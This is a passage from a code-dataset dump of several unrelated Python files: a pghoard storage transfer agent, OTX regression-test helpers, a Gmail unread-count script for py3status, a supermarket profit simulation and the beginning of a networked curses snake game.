\"\"\"\n global _last_stats_transmit_time # pylint: disable=global-statement\n with _STATS_LOCK:\n if time.time() - _last_stats_transmit_time < 10.0:\n return\n\n for site in self.state:\n for filetype, prop in self.state[site][\"upload\"].items():\n if prop[\"last_success\"]:\n self.stats.gauge(\n \"pghoard.last_upload_age\",\n time.time() - prop[\"last_success\"],\n tags={\n \"site\": site,\n \"type\": filetype,\n }\n )\n _last_stats_transmit_time = time.time()\n\n def run(self):\n while self.running:\n self.transmit_statsd_metrics()\n try:\n file_to_transfer = self.transfer_queue.get(timeout=1.0)\n except Empty:\n continue\n if file_to_transfer[\"type\"] == \"QUIT\":\n break\n self.log.debug(\"Starting to %r %r, size: %r\",\n file_to_transfer[\"type\"], file_to_transfer[\"local_path\"],\n file_to_transfer.get(\"file_size\", \"unknown\"))\n file_to_transfer.setdefault(\"path_prefix\", self.config[\"path_prefix\"])\n start_time = time.time()\n key = self.form_key_path(file_to_transfer)\n oper = file_to_transfer[\"type\"].lower()\n oper_func = getattr(self, \"handle_\" + oper, None)\n if oper_func is None:\n self.log.warning(\"Invalid operation %r\", file_to_transfer[\"type\"])\n continue\n site = file_to_transfer[\"site\"]\n filetype = file_to_transfer[\"filetype\"]\n\n result = oper_func(site, key, file_to_transfer)\n\n # increment statistics counters\n self.set_state_defaults_for_site(site)\n oper_size = file_to_transfer.get(\"file_size\", 0)\n if result[\"success\"]:\n filename = os.path.basename(file_to_transfer[\"local_path\"])\n if oper == \"upload\":\n if filetype == \"xlog\":\n self.state[site][oper][\"xlog\"][\"xlogs_since_basebackup\"] += 1\n elif filetype == \"basebackup\":\n # reset corresponding xlog stats at basebackup\n self.state[site][oper][\"xlog\"][\"xlogs_since_basebackup\"] = 0\n\n self.stats.gauge(\n \"pghoard.xlogs_since_basebackup\",\n self.state[site][oper][\"xlog\"][\"xlogs_since_basebackup\"],\n tags={\"site\": site})\n\n self.state[site][oper][filetype][\"last_success\"] = time.time()\n self.state[site][oper][filetype][\"count\"] += 1\n self.state[site][oper][filetype][\"data\"] += oper_size\n self.stats.gauge(\n \"pghoard.total_upload_size\",\n self.state[site][oper][filetype][\"data\"],\n tags={\n \"type\": filetype,\n \"site\": site,\n })\n self.state[site][oper][filetype][\"time_taken\"] += time.time() - start_time\n self.state[site][oper][filetype][\"latest_filename\"] = filename\n else:\n self.state[site][oper][filetype][\"failures\"] += 1\n\n if oper == \"upload\":\n self.stats.increase(\n \"pghoard.upload_size\",\n inc_value=oper_size,\n tags={\n \"result\": \"ok\" if result[\"success\"] else \"failed\",\n \"type\": filetype,\n \"site\": site,\n })\n\n # push result to callback_queue if provided\n if result.get(\"call_callback\", True) and file_to_transfer.get(\"callback_queue\"):\n file_to_transfer[\"callback_queue\"].put(result)\n\n self.log.info(\"%r %stransfer of key: %r, size: %r, took %.3fs\",\n file_to_transfer[\"type\"],\n \"FAILED \" if not result[\"success\"] else \"\",\n key, oper_size, time.time() - start_time)\n\n self.log.debug(\"Quitting TransferAgent\")\n\n def handle_list(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n items = storage.list_path(key)\n file_to_transfer[\"file_size\"] = len(repr(items)) # approx\n return {\"success\": True, \"items\": items, \"opaque\": file_to_transfer.get(\"opaque\")}\n except FileNotFoundFromStorageError as ex:\n self.log.warning(\"%r not found from storage\", 
key)\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem happened when retrieving metadata: %r, %r\", key, file_to_transfer)\n self.stats.unexpected_exception(ex, where=\"handle_list\")\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n\n def handle_metadata(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n metadata = storage.get_metadata_for_key(key)\n file_to_transfer[\"file_size\"] = len(repr(metadata)) # approx\n return {\"success\": True, \"metadata\": metadata, \"opaque\": file_to_transfer.get(\"opaque\")}\n except FileNotFoundFromStorageError as ex:\n self.log.warning(\"%r not found from storage\", key)\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem happened when retrieving metadata: %r, %r\", key, file_to_transfer)\n self.stats.unexpected_exception(ex, where=\"handle_metadata\")\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n\n def handle_download(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n\n content, metadata = storage.get_contents_to_string(key)\n file_to_transfer[\"file_size\"] = len(content)\n # Note that here we flip the local_path to mean the target_path\n self.compression_queue.put({\n \"blob\": content,\n \"callback_queue\": file_to_transfer[\"callback_queue\"],\n \"local_path\": file_to_transfer[\"target_path\"],\n \"metadata\": metadata,\n \"opaque\": file_to_transfer.get(\"opaque\"),\n \"site\": site,\n \"type\": \"DECOMPRESSION\",\n })\n return {\"success\": True, \"call_callback\": False}\n except FileNotFoundFromStorageError as ex:\n self.log.warning(\"%r not found from storage\", key)\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem happened when downloading: %r, %r\", key, file_to_transfer)\n self.stats.unexpected_exception(ex, where=\"handle_download\")\n return {\"success\": False, \"exception\": ex, \"opaque\": file_to_transfer.get(\"opaque\")}\n\n def handle_upload(self, site, key, file_to_transfer):\n try:\n storage = self.get_object_storage(site)\n unlink_local = False\n if \"blob\" in file_to_transfer:\n storage.store_file_from_memory(key, file_to_transfer[\"blob\"],\n metadata=file_to_transfer[\"metadata\"])\n else:\n # Basebackups may be multipart uploads, depending on the driver.\n # Swift needs to know about this so it can do possible cleanups.\n multipart = file_to_transfer[\"filetype\"] == \"basebackup\"\n try:\n storage.store_file_from_disk(key, file_to_transfer[\"local_path\"],\n metadata=file_to_transfer[\"metadata\"],\n multipart=multipart)\n unlink_local = True\n except LocalFileIsRemoteFileError:\n pass\n if unlink_local:\n try:\n self.log.debug(\"Deleting file: %r since it has been uploaded\", file_to_transfer[\"local_path\"])\n os.unlink(file_to_transfer[\"local_path\"])\n metadata_path = file_to_transfer[\"local_path\"] + \".metadata\"\n with suppress(FileNotFoundError):\n os.unlink(metadata_path)\n except Exception as ex: # pylint: disable=broad-except\n self.log.exception(\"Problem in deleting file: %r\", file_to_transfer[\"local_path\"])\n self.stats.unexpected_exception(ex, 
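The module-level _STATS_LOCK / _last_stats_transmit_time pair above throttles transmit_statsd_metrics to once per ten seconds across all transfer threads; the same idea packaged as a small reusable class (a sketch, not pghoard's API):

import threading
import time

class Throttle:
    """Allow an action at most once per `interval` seconds, thread-safely."""
    def __init__(self, interval):
        self.interval = interval
        self._lock = threading.Lock()
        self._last = None

    def ready(self):
        with self._lock:
            now = time.monotonic()
            if self._last is not None and now - self._last < self.interval:
                return False
            self._last = now
            return True

throttle = Throttle(10.0)
assert throttle.ready() is True      # first caller passes
assert throttle.ready() is False     # immediate retry is suppressed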
where=\"handle_upload_unlink\")\n return {\"success\": True, \"opaque\": file_to_transfer.get(\"opaque\")}\n except Exception as ex: # pylint: disable=broad-except\n if file_to_transfer.get(\"retries\", 0) > 0:\n self.log.exception(\"Problem in moving file: %r, need to retry\", file_to_transfer[\"local_path\"])\n # Ignore the exception the first time round as some object stores have frequent Internal Errors\n # and the upload usually goes through without any issues the second time round\n self.stats.unexpected_exception(ex, where=\"handle_upload\")\n else:\n self.log.warning(\"Problem in moving file: %r need to retry\", file_to_transfer[\"local_path\"])\n # Sleep for a bit to avoid busy looping\n time.sleep(0.5)\n\n file_to_transfer[\"retries\"] = file_to_transfer.get(\"retries\", 0) + 1\n if file_to_transfer[\"retries\"] > self.config[\"upload_retries_warning_limit\"]:\n create_alert_file(self.config, \"upload_retries_warning\")\n\n self.transfer_queue.put(file_to_transfer)\n return {\"success\": False, \"call_callback\": False, \"exception\": ex}\n","sub_path":"pghoard/transfer.py","file_name":"transfer.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"381763680","text":"# Copyright (C) 2021 Intel Corporation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions\n# and limitations under the License.\n\nimport json\nfrom pathlib import Path\nfrom typing import Any, Dict, List, Union\n\nfrom otx.api.entities.model_template import ModelTemplate\n\nTEST_TYPES = [\"train\", \"export\", \"deploy\", \"nncf\", \"pot\"]\nTASK_TYPES = [\n \"classification\",\n \"detection\",\n \"semantic_segmentation\",\n \"instance_segmentation\",\n \"action_classification\",\n \"action_detection\",\n \"anomaly\",\n]\nTRAIN_TYPES = [\"supervised\", \"semi_supervised\", \"self_supervised\", \"class_incr\", \"tiling\"]\nLABEL_TYPES = [\"multi_class\", \"multi_label\", \"h_label\", \"supcon\"]\n\nREGRESSION_TEST_EPOCHS = \"10\"\n\nANOMALY_DATASET_CATEGORIES = [\n \"bottle\",\n \"cable\",\n \"capsule\",\n \"carpet\",\n \"grid\",\n \"hazelnut\",\n \"leather\",\n \"metal_nut\",\n \"pill\",\n \"screw\",\n \"tile\",\n \"toothbrush\",\n \"transistor\",\n \"wood\",\n \"zipper\",\n]\n\n\nTIME_LOG = {\n \"train_time\": \"Train + val time (sec.)\",\n \"infer_time\": \"Infer time (sec.)\",\n \"export_time\": \"Export time (sec.)\",\n \"export_eval_time\": \"Export eval time (sec.)\",\n \"deploy_time\": \"Deploy time (sec.)\",\n \"deploy_eval_time\": \"Deploy eval time (sec.)\",\n \"nncf_time\": \"NNCF time (sec.)\",\n \"nncf_eval_time\": \"NNCF eval time (sec.)\",\n \"pot_time\": \"POT time (sec.)\",\n \"pot_eval_time\": \"POT eval time (sec.)\",\n}\n\n\ndef get_result_dict(task_type: str) -> Dict[str, Any]:\n result_dict = {task_type: {}}\n if \"anomaly\" not in task_type:\n for label_type in LABEL_TYPES:\n result_dict[task_type][label_type] = {}\n for train_type in TRAIN_TYPES:\n result_dict[task_type][label_type][train_type] = {}\n for test_type in TEST_TYPES:\n 
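handle_upload above sleeps a flat 0.5 s before requeueing a failed transfer and warns once retries pass upload_retries_warning_limit; if one preferred exponential backoff over a fixed delay, a minimal helper could look like this (hypothetical, not what pghoard does):

def backoff_delay(retries, base=0.5, cap=30.0):
    # 0.5 s, 1 s, 2 s, ... doubled per retry and capped
    return min(cap, base * (2 ** retries))

assert backoff_delay(0) == 0.5
assert backoff_delay(3) == 4.0
assert backoff_delay(10) == 30.0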
result_dict[task_type][label_type][train_type][test_type] = []\n else:\n for test_type in TEST_TYPES:\n result_dict[task_type][test_type] = {}\n for category in ANOMALY_DATASET_CATEGORIES:\n result_dict[task_type][test_type][category] = []\n\n return result_dict\n\n\ndef load_regression_config(otx_dir: str) -> Dict[str, Any]:\n \"\"\"Load regression config from path.\n\n Args:\n otx_dir (str): The path of otx root directory\n\n Returns:\n Dict[str, Any]: The dictionary that includes data roots\n \"\"\"\n root_path = Path(otx_dir)\n with open(root_path / (\"tests/regression/regression_config.json\"), \"r\") as f:\n reg_config = json.load(f)\n return reg_config\n\n\ndef load_regression_configuration(\n otx_dir: str, task_type: str, train_type: str = \"\", label_type: str = \"\"\n) -> Dict[str, Union[str, int, float]]:\n \"\"\"Load dataset path according to task, train, label types.\n\n Args:\n otx_dir (str): The path of otx root directoy\n task_type (str): [\"classification\", \"detection\", \"instance segmentation\", \"semantic segmentation\",\n \"action_classification\", \"action_detection\", \"anomaly\"]\n train_type (str): [\"supervised\", \"semi_supervised\", \"self_supervised\", \"class_incr\"]\n label_type (str): [\"multi_class\", \"multi_label\", \"h_label\", \"supcon\"]\n\n Returns:\n Dict[str, Union[int, float]]: The dictionary that includes model criteria\n \"\"\"\n reg_config = load_regression_config(otx_dir)\n result: Dict[str, Union[str, int, float]] = {\n \"data_path\": \"\",\n \"model_criteria\": 0,\n }\n\n if \"anomaly\" not in task_type:\n if train_type == \"\" or label_type == \"\":\n raise ValueError()\n result[\"regression_criteria\"] = reg_config[\"regression_criteria\"][task_type][train_type][label_type]\n result[\"kpi_e2e_train_time_criteria\"] = reg_config[\"kpi_e2e_train_time_criteria\"][task_type][train_type][\n label_type\n ]\n result[\"kpi_e2e_eval_time_criteria\"] = reg_config[\"kpi_e2e_eval_time_criteria\"][task_type][train_type][\n label_type\n ]\n result[\"data_path\"] = reg_config[\"data_path\"][task_type][train_type][label_type]\n else:\n result[\"regression_criteria\"] = reg_config[\"regression_criteria\"][task_type]\n result[\"kpi_e2e_train_time_criteria\"] = reg_config[\"kpi_e2e_train_time_criteria\"][task_type]\n result[\"kpi_e2e_eval_time_criteria\"] = reg_config[\"kpi_e2e_eval_time_criteria\"][task_type]\n result[\"data_path\"] = reg_config[\"data_path\"][task_type]\n\n return result\n\n\ndef get_template_performance(results: List[Dict], template: ModelTemplate):\n \"\"\"Get proper template performance inside of performance list.\"\"\"\n performance = None\n for result in results:\n template_name = list(result.keys())[0]\n if template_name == template.name:\n performance = result\n break\n if performance is None:\n raise ValueError(\"Performance is None.\")\n return performance\n","sub_path":"tests/regression/regression_test_helpers.py","file_name":"regression_test_helpers.py","file_ext":"py","file_size_in_byte":5299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"555238658","text":"from __future__ import print_function\nimport httplib2\nimport os\nimport pprint\nfrom apiclient import discovery\nimport oauth2client\nfrom oauth2client import client\nfrom oauth2client import tools\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\nSCOPES = 'https://www.googleapis.com/auth/gmail.readonly'\nCLIENT_SECRET_FILE = 
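get_result_dict above nests four levels for regular tasks (task, then label type, train type, test type) and three for anomaly (task, test type, dataset category); a quick shape check, assuming the helper is importable:

d = get_result_dict('classification')
assert d['classification']['multi_class']['supervised']['train'] == []

a = get_result_dict('anomaly')
assert a['anomaly']['pot']['bottle'] == []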
'client_secret.json'\nAPPLICATION_NAME = 'py3status gmail notificator'\nhome_dir = os.path.expanduser('~')\ncredential_dir = os.path.join(home_dir, '.credentials')\n\n\ndef get_credentials(account):\n    # 'account' must not shadow the oauth2client 'client' module used below\n    if not os.path.exists(credential_dir):\n        os.makedirs(credential_dir)\n\n    credential_path = os.path.join(credential_dir,\n                                   account)\n\n    store = oauth2client.file.Storage(credential_path)\n    credentials = store.get()\n    if not credentials or credentials.invalid:\n        flow = client.flow_from_clientsecrets(CLIENT_SECRET_FILE, SCOPES)\n        flow.user_agent = APPLICATION_NAME\n        if flags:\n            credentials = tools.run_flow(flow, store, flags)\n        else:  # Needed only for python <2.6\n            credentials = tools.run(flow, store)\n        print('Storing credentials to ' + credential_path)\n    return credentials\n\ndef main():\n\n    store_path = \"/tmp/py3status-gmail/\"  # path where results will be saved\n    if not os.path.exists(store_path):\n        os.makedirs(store_path)\n\n    accounts = os.listdir(credential_dir)  # one stored credential file per account\n    for account in accounts:\n\n        credentials = get_credentials(account)\n        http = credentials.authorize(httplib2.Http())\n        service = discovery.build('gmail', 'v1', http=http)\n\n        results = service.users().labels().list(userId='me').execute()\n        labels = results.get('labels', [])\n        unreads = service.users().labels().get(userId='me', id='UNREAD').execute()\n\n        with open(store_path + account + '.res', 'w') as store:\n            store.write(str(unreads['messagesTotal']))\n\nif __name__ == '__main__':\n    main()\n","sub_path":"py3status-gmail/api_get_data.py","file_name":"api_get_data.py","file_ext":"py","file_size_in_byte":2047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
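main() in api_get_data.py above leaves one '<account>.res' file per account under /tmp/py3status-gmail/, each holding a single integer; a possible reader for the py3status side (a hypothetical helper, not part of the script):

import os

def read_unread_counts(path='/tmp/py3status-gmail/'):
    # map account name -> unread count, from the .res files written by main()
    counts = {}
    for name in os.listdir(path):
        if name.endswith('.res'):
            with open(os.path.join(path, name)) as f:
                counts[name[:-len('.res')]] = int(f.read() or 0)
    return counts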
{"seq_id":"625147806","text":"import math\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport threading\n\n\nprice_level = {'level1': 5,\n               'level2': 15,\n               'level3': 30,\n               'level4': 50,\n               'level5': 80}\n\nincome_level = {\"low\": 300,\n                \"median\": 1000,\n                \"high\": 2000}\n\nlevel_style = {'level1': '.',\n               'level2': 'o',\n               'level3': '^',\n               'level4': '*',\n               'level5': '|'}\n\nlevel_color = {'level1': 'red',\n               'level2': 'blue',\n               'level3': 'green',\n               'level4': 'grey',\n               'level5': 'orange'}\n\n\n\nclass Market:\n    def __init__(self, location, level:str, size:int):\n        '''\n        Each Market object represents the basic info and the profit of the corresponding market.\n        :param location: the location coordinate of a certain market\n        :param level: the price level of the Market. From level1 to level5. The higher the level, the more expensive it is.\n        :param size: the maximum capacity of the market\n        '''\n        self.location = location\n        self.buy_price = price_level[level]\n        self.sell_price = self.buy_price * 2\n        self.size = size\n        self.level = level\n    def getCost(self):\n        '''\n        :return: the total cost for running the store, including stocking with goods and the hiring fee.\n        '''\n        return self.buy_price * self.size * 1.2\n    def getProfit(self, cust_num):\n        '''\n        :param cust_num: the number of customers that will purchase in this market\n        :return: the total profit for running this store (calculated as income - cost)\n        '''\n        return self.sell_price * min(cust_num,self.size) - self.getCost()\n\n\nclass Resident:\n    def __init__(self, level:str, home_loc):\n        '''\n        :param level: the income level for the resident, could be low, median or high.\n        :param home_loc: the coordinate of the resident's home\n        '''\n        self.income = income_level[level]\n        self.home_loc = home_loc\n    def getBudget(self):\n        '''\n        :return: the maximum shopping budget that the resident can afford.\n        '''\n        return self.income/10\n    def getDistance(self, location):\n        '''\n        :param location: the location coordinate of a certain market\n        :return: the distance from the resident's home to the market\n        '''\n        return math.sqrt(np.square(self.home_loc[0] - location[0]) + np.square(self.home_loc[1] - location[1]))\n    def purchase(self, price, location, size):\n        '''\n        :param price: the average selling price of a certain market\n        :param location: the location coordinate of a certain market\n        :param size: the maximum capacity of a certain market\n        :return: whether the resident would purchase in the certain market: True means the resident will purchase there, False means not.\n        '''\n        if self.getBudget() >= price and self.getDistance(location) <= math.sqrt(size):\n            return True\n        else:\n            return False\n\nclass Company:\n    def __init__(self,budget:int):\n        '''\n        :param budget: the total budget of this company\n        '''\n        self.budget = budget\n    def getMaxamount(self,Market):\n        '''\n        Given a certain Market object, calculate, according to the company's budget, how many markets of the same size and level can be started at most.\n        :param Market: a certain market object\n        :return: the upper limit on the number of markets that could be started by the company.\n        '''\n        return self.budget/Market.getCost()\n\n\ndef getMap(row:int, col:int, rich_area:list, poor_area:list):\n    '''\n    This function allows users to create a city map by specifying the city size and the locations of the wealthy and poor areas.\n    :param row: The rows of the entire city\n    :param col: The columns of the entire city\n    :param rich_area: a list containing the start point and end point of the wealthy area.\n    :param poor_area: a list containing the start point and end point of the poor area.\n    :return: a map of a city\n    >>> print(getMap(1, 1, [[0, 0], [0, 0]], [[0, 0], [0, 0]]))\n    [[0]]\n    >>> print(getMap(4, 5, [[1, 2], [3, 4]], [[7, 8], [8, 8]]))\n    [[1 1 1 1 1]\n     [1 1 2 2 2]\n     [1 1 2 2 2]\n     [1 1 2 2 2]]\n    >>> test_map = getMap(70, 80, [[1, 2], [3, 4]], [[7, 8], [8, 8]])\n    >>> test_map.size\n    5600\n    '''\n    map = np.ones([row, col], dtype=int)\n    rich_start = rich_area[0]\n    rich_end = rich_area[1]\n    poor_start = poor_area[0]\n    poor_end = poor_area[1]\n    map[rich_start[0]:rich_end[0]+1,rich_start[1]:rich_end[1]+1] = 2\n    map[poor_start[0]:poor_end[0]+1,poor_start[1]:poor_end[1]+1] = 0\n    return map\n\n\ndef getResidents(map):\n    '''\n    Assume that we already have a map of a city; this function will generate a nested list of Resident objects (one inner list per map row) according to your map.\n    :param map: The map of the city\n    :return: a nested list of Resident objects\n    >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n    >>> test_Resident = getResidents(test_map)\n    >>> len(test_Resident) == test_map.shape[0]\n    True\n    '''\n    resident_list = []\n    map_row = map.shape[0]\n    map_col = map.shape[1]\n    for i in range(0,map_row):\n        row_list = []\n        for j in range(0,map_col):\n            if map[i][j] == 2:\n                resident = Resident('high',(i,j))\n                row_list.append(resident)\n            elif map[i][j] == 1:\n                resident = Resident('median',(i,j))\n                row_list.append(resident)\n            else:\n                resident = Resident('low', (i, j))\n                row_list.append(resident)\n        resident_list.append(row_list)\n    return resident_list\n\n\ndef randomStoreLoc(map,amount:int,uniform:bool):\n    '''\n    Randomly generate the locations of the markets on the map.\n    :param map: city map\n    :param amount: the number of markets to be generated\n    :param uniform: bool type, True means distribute the stores uniformly across the city\n    :return: a list of market locations\n    >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n    >>> test_map.size\n    100\n    >>> test_Resident = getResidents(test_map)\n    >>> test_market = Market((0, 0), \"level2\", 40)\n    >>> amount = 40\n    >>> store_list = randomStoreLoc(test_map,amount,True)\n    >>> len(store_list)\n    40\n    '''\n    map_row = map.shape[0]\n    map_col = map.shape[1]\n    map_size = map.size\n    store_loc_list = []\n    if uniform == False:\n        for store in range(amount):\n            store_row = np.random.randint(low=0, high=map_row, size=1, dtype=int)\n            store_col = np.random.randint(low=0, high=map_col, size=1, dtype=int)\n            store_loc = [store_row[0],store_col[0]]\n            store_loc_list.append(store_loc)\n    else:\n        # exactly `amount` evenly spaced cell indices, mapped row-major onto the grid\n        loc_num = np.linspace(0, map_size - 1, amount, dtype=int)\n        for num in loc_num:\n            store_row, store_col = divmod(int(num), map_col)\n            store_loc_list.append([store_row, store_col])\n\n    return store_loc_list\n\ndef getMarkets(store_loc_list,level,size):\n    '''\n    Given a list of store locations, this function will automatically generate the corresponding Market objects.\n    :param store_loc_list: the list of store locations\n    :param level: the level of the stores to be generated\n    :param size: the size of the markets\n    :return: a list of Market objects\n    >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n    >>> test_map.size\n    100\n    >>> test_Resident = getResidents(test_map)\n    >>> test_market = Market((0, 0), \"level2\", 40)\n    >>> amount = 50\n    >>> store_list = randomStoreLoc(test_map,amount,True)\n    >>> len(getMarkets(store_list, \"level2\", 40))\n    50\n    '''\n    market_list = []\n    for loc in store_loc_list:\n        new_market = Market(loc,level,size)\n        market_list.append(new_market)\n    return market_list\n\n\ndef getCustAmount(Market:object,resident_list:list):\n    \"\"\"\n    For a specific market, given the nested list of Resident objects, this function will calculate the number of residents that will purchase in this market.\n    :param Market: the target market object\n    :param resident_list: the nested list of Resident objects\n    :return: the number of customers\n    >>> test_map = getMap(10, 10, [[0, 0], [0, 0]], [[0, 0], [0, 0]])\n    >>> test_Resident = getResidents(test_map)\n    >>> test_market = Market((0, 0), \"level2\", 40)\n    >>> getCustAmount(test_market, test_Resident) <= test_map.size\n    True\n    
\"\"\"\n cust_num = 0\n for row in resident_list:\n for resident in row:\n if resident.purchase(Market.sell_price, Market.location, Market.size) == True:\n cust_num += 1\n return cust_num\n\ndef getTotalProfit(market_list, resident_list):\n '''\n Given a list of Market object and a list of Resident object, this function will calculate the total profit of all the markets\n :param market_list: a list of Market object\n :param resident_list: a list of Resident object\n :return: the amount of total profit\n '''\n total_profit = 0\n for market in market_list:\n cust_num = getCustAmount(market,resident_list)\n profit = market.getProfit(cust_num)\n total_profit += profit\n return total_profit\n\ndef sizeProfitPlot(map,resident,company,possible_size,city_type):\n '''\n This function will generate a line plot which demonstrate the relationship between the size of supermarket and the total profit.\n :param map: The city map\n :param resident: a list of resident object\n :param company: a company object\n :param possible_size: a list of possible size\n :param city_type: the type of the city, used to generated the name of the x-axis of the plot.\n :return:\n '''\n plt.cla\n for level in price_level:\n profit = []\n for size in possible_size:\n test_market = Market((0, 0), level, size)\n random_loc = randomStoreLoc(map, company.getMaxamount(test_market), True)\n rand_markets = getMarkets(random_loc, level, size)\n profit.append(getTotalProfit(rand_markets, resident))\n plt.title('Relationship Between Size and Profit')\n plt.plot(possible_size,profit,marker=level_style[level],color=level_color[level],label=level)\n plt.xlabel('Size of market(persons)')\n plt.ylabel('Profit($)')\n plt.legend()\n plt.savefig(city_type)\n plt.close('all')\n\ndef levelProfitPlot(map,resident,company,size):\n '''\n Given a map and a list of residents, this function will generate a plot that demonstrated the relationship between the distribution style, market level and the total profit.\n :param map: The map of the city\n :param resident: a list of Resident object\n :param company: a company object\n :param size: the size of the market\n :return:\n '''\n plt.cla\n level_list = price_level.keys()\n profit_uni = []\n for level in level_list:\n test_market = Market((0, 0), level, size)\n loc = randomStoreLoc(map, int(company.getMaxamount(test_market)), True)\n markets_list = getMarkets(loc, level, size)\n profit_uni.append(getTotalProfit(markets_list, resident))\n plt.title('The Influence of Market Distribution')\n plt.plot(level_list, profit_uni, \"g+-\", label=\"Uniform Distribution\")\n profit_rand = []\n\n def random_test(level, size, times):\n pro_sum = 0\n for count in range(times):\n test_market = Market((0, 0), level, size)\n loc = randomStoreLoc(map, int(company.getMaxamount(test_market)), False)\n markets_list = getMarkets(loc, level, size)\n pro_sum += getTotalProfit(markets_list, resident)\n avg_pro = pro_sum/times\n return avg_pro\n\n for level in level_list:\n profit_rand.append(random_test(level,size,100))\n plt.plot(level_list, profit_rand, 'r^-', label=\"Random Distribution\")\n plt.xlabel('Level Of Market')\n plt.ylabel('Total Profit($)')\n plt.legend()\n plt.savefig('MarkerDistributionVsProfit')\n plt.close('all')\n\n\ndef main():\n\n companyA = Company(15000)\n city_row = 100\n city_col = 100\n cityMap = getMap(city_row, city_col, [[0, 0], [40, 40]], [[60, 60], [99, 99]])\n # Generate a city (average income) map with 100 rows and 100 columns, rich area is from (0,0) to (40,40), low-income area is from (60,60) 
to (99,99)\n rich_cityMap = getMap(city_row, city_col, [[0, 0], [70, 70]], [[90, 90], [99, 99]])\n poor_cityMap = getMap(city_row, city_col, [[0, 0], [10, 10]], [[30, 30], [99, 99]])\n cityResident = getResidents(cityMap)\n rich_cityResident = getResidents(rich_cityMap)\n poor_cityResident = getResidents(poor_cityMap)\n\n\n # simulation for hypothesis one:\n # The best size and level of supermarkets to be started is related to the population and income level\n possible_size = range(10,80,10)\n sizeProfitPlot(cityMap,cityResident,companyA,possible_size,\"averageCity\")\n sizeProfitPlot(rich_cityMap, rich_cityResident, companyA, possible_size, \"richCity\")\n sizeProfitPlot(poor_cityMap, poor_cityResident, companyA, possible_size, \"poorCity\")\n\n\n # simulation for hypothesis two:\n # simulation for random distribution and even distribution\n levelProfitPlot(cityMap,cityResident,companyA,40)\n\n\nif __name__ == '__main__':\n main()\n\n\n","sub_path":"Market_Profit.py","file_name":"Market_Profit.py","file_ext":"py","file_size_in_byte":13712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"385422904","text":"import curses\nimport time\nimport random\nimport socket\n\n\nstartlength = 5\ngrowlength =1 \nspeed = {'Easy':0.1,'Medium':0.06, 'Hard':0.04}\ndifficulty = 'Medium'\naccelration = True\nscreen = curses.initscr() # initialise the screen\nscreen.keypad(1) #take input from keyboard\nh,w= screen.getmaxyx() #the screen dimensions\n\ndef connect_server():\n\n global s\n s = socket.socket()\n host = '10.130.48.106'\n port = 5554\n\n s.connect((host,port))\n\ndef parse_data():\n data = s.recv(1024)\n reply = data[:].decode(\"utf-8\")\n print(\"look here\", reply)\n split_data = reply.split(',') # it splits the data into two parts of ydata and xdata strings\n y_data = int(split_data[0].strip('[]')) # it strips any non numerical character and converts into int\n x_data = int(split_data[1].strip('[]'))\n\n screen.addch(y_data,x_data, curses.ACS_CKBOARD) # displays it on screen\n\n\ndef game():\n screen.clear()#clear the screen in the start\n curses.start_color() #black background\n curses.curs_set(0)# cursor visibility zero\n curses.noecho() #does not echo the keys pressed\n screen.border() # sets a border\n screen.nodelay(1)# so we dont have to wait for anything to happen\n head = [random.randrange(1,h-1),random.randrange(1,w-1)] # random starting postion of snake\n body = [head[:]]*startlength\n \n gameover = False\n direction = 0 # 0: right, 1: down, 2: left, 3: up \n q=0\n deadcell = body[-1][:]\n foodmade = False\n\n global s\n\n while not gameover:\n\n while not foodmade:\n y,x = random.randrange(1, h-1),random.randrange(1,w-1)\n if screen.inch(y,x) == ord(' '):\n screen.addch(y,x,ord('$'))\n foodmade = True\n\n if deadcell not in body:\n screen.addch(deadcell[0],deadcell[1],' ')\n \n action = screen.getch()\n if action == curses.KEY_UP and direction != 1:\n direction =3\n if action == curses.KEY_DOWN and direction != 3:\n direction =1\n if action == curses.KEY_LEFT and direction != 0:\n direction =2\n if action == curses.KEY_RIGHT and direction != 2:\n direction =0\n\n screen.addch(head[0],head[1], curses.ACS_CKBOARD)\n\n# the code here receives the information about the other snakes and display them\n\n\n parse_data() #reads the data and puts it on screen\n\n send_p_data = \"the enemy snake is at \" + str(head)\n s.send(str.encode(send_p_data))\n\n\n\n if direction == 0:\n head[1] += 1\n if direction == 2:\n head[1] -= 1\n if 
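To make the Market/Resident arithmetic above concrete: a level2 market buys at 15 and sells at 30, so a size-40 store costs 15 * 40 * 1.2 = 720 and nets 30 * min(50, 40) - 720 = 480 from 50 would-be customers, while a median-income resident (budget 1000/10 = 100) only shops within a radius of sqrt(40), about 6.32 cells:

m = Market((0, 0), 'level2', 40)
assert m.getCost() == 720.0
assert m.getProfit(50) == 480.0

r = Resident('median', (0, 0))
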